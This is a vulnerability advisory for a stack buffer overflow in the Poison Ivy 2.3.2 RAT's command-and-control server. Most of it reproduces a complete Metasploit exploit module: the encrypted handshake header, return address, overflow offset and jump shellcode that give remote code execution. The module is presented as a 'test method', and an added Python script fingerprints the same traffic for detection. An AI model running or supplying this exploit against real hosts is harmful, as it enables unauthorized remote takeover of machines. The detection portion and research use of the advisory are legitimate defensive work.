Release date:
Updated on:
Affected Systems:
Poison Ivy 2.3.2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54339
Poison Ivy is a remote administration tool (RAT) built as a bot (client) that reports to a command-and-control (C&C) server.
Poison Ivy 2.3.2 contains a stack buffer overflow in its C&C server. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.
<* Source: Metasploit *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
Metasploit provides the following test method:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Brute

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
      'Description'    => %q{
        This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server.
        The exploit does not need to know the password chosen for the bot/server
        communication. If the C&C is configured with the default 'admin' password,
        the exploit should work fine. In case of the C&C configured with another
        password the exploit can fail. The 'check' command can be used to determine
        if the C&C target is using the default 'admin' password.

        Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread
        responsible of handling the connection. Because of this the module provides the
        RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header
        will be used. If the bruteforce target is selected, a random header will be sent in
        case the default for the password 'admin' doesn't work. Bruteforce will stop after
        5 tries or a session obtained.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Andrzej Dereszowski', # Vulnerability Discovery
          'Gal Badishi',         # Exploit and Metasploit module
          'juan vazquez'         # Testing and little of Metasploit-fu
        ],
      'References'     =>
        [
          [ 'URL', 'http://www.signal11.eu/en/research/articles/targeted_2010.pdf' ],
          [ 'URL', 'http://badishi.com/own-and-you-shall-be-owned' ]
        ],
      'DisclosureDate' => "Jun 24 2012",
      'DefaultOptions' =>
        {
          'ExitFunction' => 'thread',
        },
      'Payload'        =>
        {
          'StackAdjustment' => -4000,
          'Space'           => 10000,
          'BadChars'        => "",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'           => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
              'RWAddress'     => 0x00401000,
              'Offset'        => 0x806D,
              'PayloadOffset' => 0x75,
              'jmpPayload'    => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp, 0x8000 # jmp esp
            }
          ],
          [ 'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'           => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
              'RWAddress'     => 0x00401000,
              'Offset'        => 0x806D,
              'PayloadOffset' => 0x75,
              'jmpPayload'    => "\x81\xec\x00\x80\x00\x00\xff\xe4", # sub esp, 0x8000 # jmp esp
              'Bruteforce'    =>
                {
                  'Start' => { 'try' => 1 },
                  'Stop'  => { 'try' => 6 },
                  'Step'  => 1,
                  'Delay' => 2
                }
            }
          ],
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(3460),
        OptBool.new('RANDHEADER', [true, 'Send random bytes as the header', false])
      ], self.class)

    register_advanced_options(
      [
        OptInt.new('BruteWait', [false, "Delay between brute force attempts", 2]),
      ], self.class)
  end

  def check
    # First 16 bytes of the server's challenge when the password is the default 'admin'
    sig = "\x35\xe1\x06\x6c\xcd\x15\x87\x3e\xee\xf8\x51\x89\x66\xb7\x0f\x8b"
    # 4-byte little-endian length a 2.3.2 server appends after the 256-byte challenge
    lensig = [0x000015D0].pack("V")

    connect
    sock.put("\x00" * 256)
    response = sock.read(1, 256)
    datalen = sock.read(4)
    disconnect

    if datalen == lensig
      if response[0, 16] == sig
        print_status("Password appears to be \"admin\"")
      else
        print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.")
      end
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def single_exploit
    if datastore['RANDHEADER'] == true
      # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
      header = rand_text(0x20)
    else
      # This is the 32-byte header we want to send, encrypted with the default password ("admin")
      # We have a very good chance of succeeding even if the password was changed
      header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
    end

    do_exploit(header)
  end

  def brute_exploit(brute_target)
    if brute_target['try'] == 1
      print_status("Bruteforcing - Try #{brute_target['try']}: Header for 'admin' password")
      # This is the 32-byte header we want to send, encrypted with the default password ("admin")
      # We have a very good chance of succeeding even if the password was changed
      header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
    else
      print_status("Bruteforcing - Try #{brute_target['try']}: Random Header")
      # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
      header = rand_text(0x20)
    end

    do_exploit(header)
  end

  def do_exploit(header)
    # Handshake
    connect
    print_status("Performing handshake...")
    sock.put("\x00" * 256)
    sock.get

    # Don't change the nulls, or it might not work
    xploit = ''
    xploit << header # 32-byte header (encrypted with 'admin', or random)
    xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
    xploit << payload.encoded
    xploit << "\x00" * (target['Offset'] - xploit.length)
    xploit << [target.ret].pack("V") # ret to a jmp esp opcode
    xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
    xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back)

    # The disconnection triggers the exploit
    print_status("Sending exploit...")
    sock.put(xploit)
    select(nil, nil, nil, 5) # give the server time to process before tearing down
    disconnect
  end
end

=begin
* ROP version of exploit: has been discarded at the moment because of two reasons:
  (1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
  (2) When trying an unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter
=end
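The `check` method above doubles as a network fingerprint: a 256-byte all-NUL opener from the client, a 256-byte challenge plus the 0x000015D0 length trailer from a 2.3.2 server, and the 16-byte 'admin'-keyed reply prefix. As an added defensive example (not part of the Metasploit module or this advisory), the Python below turns those facts into flow-classification logic that flags Poison Ivy beacons or checks in reassembled traffic and a post-handshake write running past the 0x806D boundary the module overwrites. The flow records are constructed, and the tag names and the non-default-port check are my own assumptions.

```python
import struct

# Values taken from the module above.
PI_DEFAULT_PORT = 3460                 # RPORT default
PI_OPENER_LEN = 256                    # client opens with 256 NUL bytes
PI_232_DATALEN = 0x000015D0            # LE length a 2.3.2 server appends to its challenge
PI_ADMIN_SIG = bytes.fromhex("35e1066ccd15873eeef8518966b70f8b")  # reply prefix for password 'admin'
PI_OVERFLOW_OFFSET = 0x806D            # where the module's overwrite reaches the saved return


def classify_flow(client_msgs, server_msgs, dport):
    """Tag one reassembled TCP flow (client/server payloads as ordered lists of bytes).
    Returns a list of indicator tags; an empty list means nothing Poison-Ivy-like."""
    tags = []
    if not client_msgs:
        return tags
    opener = client_msgs[0]
    # 1. Handshake fingerprint: exactly 256 bytes, all NUL (bot beacon or a 'check' probe).
    if len(opener) != PI_OPENER_LEN or opener.count(0) != PI_OPENER_LEN:
        return tags
    tags.append("poison_ivy_handshake")
    if dport != PI_DEFAULT_PORT:
        tags.append("non_default_port")
    # 2. Server fingerprint: 256-byte challenge followed by a 4-byte LE length.
    #    The two server writes may be coalesced after reassembly, so parse them joined.
    reply = b"".join(server_msgs)
    if len(reply) >= PI_OPENER_LEN + 4:
        (datalen,) = struct.unpack_from("<I", reply, PI_OPENER_LEN)
        if datalen == PI_232_DATALEN:
            tags.append("poison_ivy_2.3.2_server")
            if reply[:16] == PI_ADMIN_SIG:
                tags.append("default_admin_password")
    # 3. Exploit heuristic: a post-handshake client write long enough to reach 0x806D.
    if any(len(m) > PI_OVERFLOW_OFFSET for m in client_msgs[1:]):
        tags.append("oversized_post_handshake_write")
    return tags


# Constructed sample flows (not captured traffic).
BENIGN_FLOW = ([b"GET / HTTP/1.0\r\n\r\n"], [b"HTTP/1.0 200 OK\r\n\r\n"], 80)
EXPLOIT_FLOW = (
    [b"\x00" * 256, b"A" * 0x807D],                               # opener, then overflow-sized write
    [PI_ADMIN_SIG + b"\x00" * 240 + struct.pack("<I", 0x15D0)],   # 'admin'-keyed challenge + length
    3460,
)

if __name__ == "__main__":
    for name, flow in (("benign", BENIGN_FLOW), ("exploit", EXPLOIT_FLOW)):
        print(name, classify_flow(*flow))
```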
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Poison Ivy
----------
Currently, the vendor provides no patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:
http://www.poisonivy-rat.com/index.php